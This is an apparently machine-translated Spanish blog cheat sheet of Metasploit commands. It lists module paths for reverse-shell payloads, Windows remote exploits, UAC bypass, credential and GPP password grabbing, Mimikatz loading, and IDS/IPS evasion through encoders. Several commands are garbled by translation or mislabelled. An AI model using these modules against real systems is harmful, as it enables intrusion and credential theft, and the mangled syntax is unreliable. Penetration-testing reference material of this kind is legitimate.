¿Desea utilizar Metasploit Pro Framework o Metasploit Unleashed ? Bueno, primero necesitarás conocer sus comandos. A continuación, compartimos con usted la última Lista de comandos de Metasploit de 2021 . ¡Esta hoja de trucos contiene todos los comandos que necesitará, desde los más básicos para avanzar!
En esta guía, hablaremos sobre los conceptos básicos sobre la hoja de trucos de comandos de Metasploit que se puede utilizar en la interfaz de línea de comandos. También hay muchas otras consolas de línea de comandos disponibles en Internet (como MSFConsole Command Line ) pero son realmente difíciles de usar y comprender.
Metasploit es un producto que se puede utilizar para entrar en un sistema remoto y también se puede utilizar para probar la vulnerabilidad de un sistema informático. Como todas las demás herramientas de seguridad de la información, Metasploit también se puede utilizar para ambos propósitos (actividades no autorizadas y legítimas). El Rapid7 también ha agregado las dos ediciones o versiones patentadas llamadas Metasploit Pro y Metasploit Express. También puede ver algunos de nuestros comandos de la Terminal Kali Linux para piratería.
Metasploit destaca el riesgo y la corrección de errores particulares que podrían estar disponibles en su computadora personal (PC). Más tarde, la herramienta fuzzing también se incluyó en Metasploit 3.0, que se utilizó para descubrir las vulnerabilidades del software incluso con las vulnerabilidades de los errores conocidos. Después de algún tiempo, el conjunto de herramientas inalámbricas lorcon (802.11) también se agregó al Metasploit 3.0 en el mes de noviembre de 2006. Después de todas estas actualizaciones, Rapid7 lanzó Metasploit 4.0 en el mes de agosto de 2011.
Puede obtenga Metasploit Pro Framework de la siguiente página:
Descargue Metasploit Pro Framework gratis
H. D. Moore fue el creador de esta herramienta de red portátil llamada Metasploit usando Perl en 2003. En 2007, Metasploit Framework fue totalmente reescrito en Ruby. El st 21 de octubre de 2009, Metasploit anunció que Rapid7 lo había comprado o adquirido. Rapid7 es una empresa de seguridad que ofrece muchos tipos de soluciones unificadas de gestión de vulnerabilidades.
Comando | Descripción de CMD |
configurar la carga útil windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Comando | Descripción de CMD |
configurar la carga útil windows/vncinject/reverse_tcpset ViewOnly false | Carga útil de VNC de Windows de Meterpreter
|
Comando | Descripción de CMD |
establecer carga útil linux/meterpreter/reverse_tcp | Carga útil inversa de Meterpreter Linux |
Leer: Los 9 principales comandos de piratería del símbolo del sistema de Microsoft CMD en 2021.
Comando | Descripción de CMD |
use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
use exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 y Server 2008 (x86) Remote Exploit |
Comando | Descripción de CMD |
use exploit/windows/local/bypassuac | Omitir UAC en Windows 7 + Establecer destino + arco, x86/64 |
Comando | Descripción de CMD |
use auxiliar/scanner/http/dir_scanner | Escáner de directorio HTTP Metasploit |
use auxiliar/scanner/http/jboss_vulnscan | Escáner de vulnerabilidades de Metasploit JBOSS |
usar auxiliar/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
use auxiliar/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner |
use auxiliar/scanner/oracle/oracle_login | Módulo de inicio de sesión de Oracle Metasploit |
Lea también: La guía perfecta para ataques DDoS como un hacker profesional.
Módulos Powershell de Metasploit
Comando | Descripción de CMD |
use exploit/multi/script/web_delivery | módulo de entrega de carga útil Metasploit powershell |
post/windows/administrar/powershell/exec_powershell | Metasploit cargar y ejecutar el script de powershell a través de una sesión |
usar exploit/multi/http/jboss_maindeployer | implementación de Metasploit JBOSS |
use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Comando | Descripción de CMD |
ejecutar post/windows/collect/win_privs | Metasploit muestra los privilegios del usuario actual |
use post/windows/collect/credentials/gpp | Metasploit grab GPP contraseñas guardadas |
oad mimikatz-> wdigest | Metasplit cargar Mimikatz |
ejecutar post/windows/collect/local_admin_search_enum | Identificar otras máquinas a las que el usuario del dominio proporcionado tiene acceso administrativo |
Fuente: TheHackToday</0000-
El Comando de Metasploit para actualizar Framework:
apt update; apt install metasploit-framework |
El siguiente comando mencionado anteriormente proporciona la última versión del Marco de Metasploit actualizado. La actualización dice lo siguiente que deberíamos actualizar la actualización semanal de la copia de nuestro Metasploit Framework. Pero hay una pequeña desventaja de este comando y es que ejecutar este comando podría dañar o romper la copia de su software que está instalado en su PC.
Lectura recomendada : Arriba ¡Las 8 mejores distribuciones de Linux para pruebas de piratería y penetración!
Comandos de Metasploit msfhelp/console:
Cuando ejecuta Metasploit por primera vez, aparece la siguiente ventana se abre en su pantalla. Si no sabe nada o no tiene ninguna información relacionada con Metasploit, simplemente puede escribir: help para ver todos los comandos e información relacionada con Metasploit.
No voy a perder el tiempo al explicar todos los comandos en Metasploit, pero discutiré algunos de los comandos básicos y más utilizados que usará principalmente.
Este comando se utiliza para buscar diferentes tipos o clases de vulnerabilidades y exploits de msfconsole.
Este comando se usa para vigilar la documentación y ver al propietario del exploit.
Lea: 8 mejores formas de proteger su servidor Linux (Guía de refuerzo de Linux 2021).
Con la ayuda de este simple comando, podemos usar los comandos show para mostrar todos los valores requeridos por la carga útil que pueden usarse para atacar la PC víctima o la máquina que queremos atacar.
Con la ayuda de este comando, puede realizar fácilmente Para atacar la red WAN, solo tiene que configurar el LHOST en la dirección IP estática IP y todos los demás puertos de reenvío.
Si está intentando hacerlo en la red LAN, no tiene que realizar el reenvío de puertos, pero puede utilizar cualquier puerto que desee utilizar. Pero si está atacando la red WAN, debe reenviar el puerto que desea atacar respectivamente.
Con la ayuda de este comando, usamos el comando show payloads. Este comando devolverá una lista completa de cargas útiles compatibles para el siguiente exploit. En la siguiente imagen, Metasploit ha cargado muchas cargas útiles compatibles:
Este comando devolverá una lista completa de los sistemas operativos que son muy vulnerables al exploit seleccionado o elegido. Después de ejecutar este comando, obtenemos el siguiente resultado del siguiente exploit:
adobe_flash_shader_drawing_fill exploit.
Al usar este comando show advanced podemos ver todas las opciones avanzadas para los exploits requeridos.
Descargar: Software Nessus Professional Vulnerability Scanner.
Este comando se utiliza para devolver todos los codificadores compatibles. Estos codificadores se utilizan para evadir las firmas IDS/IPS simples que se han buscado para ciertos bytes de la carga útil disponible.
Este comando devolverá una lista completa de los generadores NOP. NOP es la abreviatura de No Operation y se utiliza para cambiar el patrón para omitir IDS/IPS simples de los trineos NOP comunes. Estos generadores NOP comienzan con una configuración completa de Arquitectura de CPU en su nombre.
Descargar: Acunetix Web Vulnerability Scanner Free.
Puede visitar el sitio oficial Sitio de seguridad ofensiva para todos los comandos de Metasploit AZ.
En este artículo, discutimos la Lista de comandos de Metasploit en 2021 también hablamos sobre muchos comandos diferentes que puede usar para realizar varias tareas y todas las diferentes funcionalidades. Es un método totalmente seguro para usar y realizar la verificación de vulnerabilidades y para resolver todos esos problemas relacionados.
Espero que esta guía sea de gran ayuda para usted. Compártelo con tus amigos y familiares para ayudarlos a resolver sus problemas. Si tiene alguna pregunta, déjela en la sección de comentarios. Siempre estamos aquí para ayudarlo si necesita ayuda.
Microsoft lanzó el sistema operativo Windows 11 de próxima generación en el último mes de…
Parece que algunos de los desafortunados usuarios de Windows encuentran el error "No se encontró…
Windows tiene una utilidad incorporada llamada System File Checker o SFC que escanea todo el…
El sistema operativo Windows es la plataforma más popular para fines educativos y laborales que…
REVISIÓN 2: Realice una restauración del sistema:REVISIÓN 3: Ejecute el Comprobador de archivos del sistema:REVISIÓN…
El Nitro 5 es un portátil para juegos voluminoso de 2,4 kg, como es típico…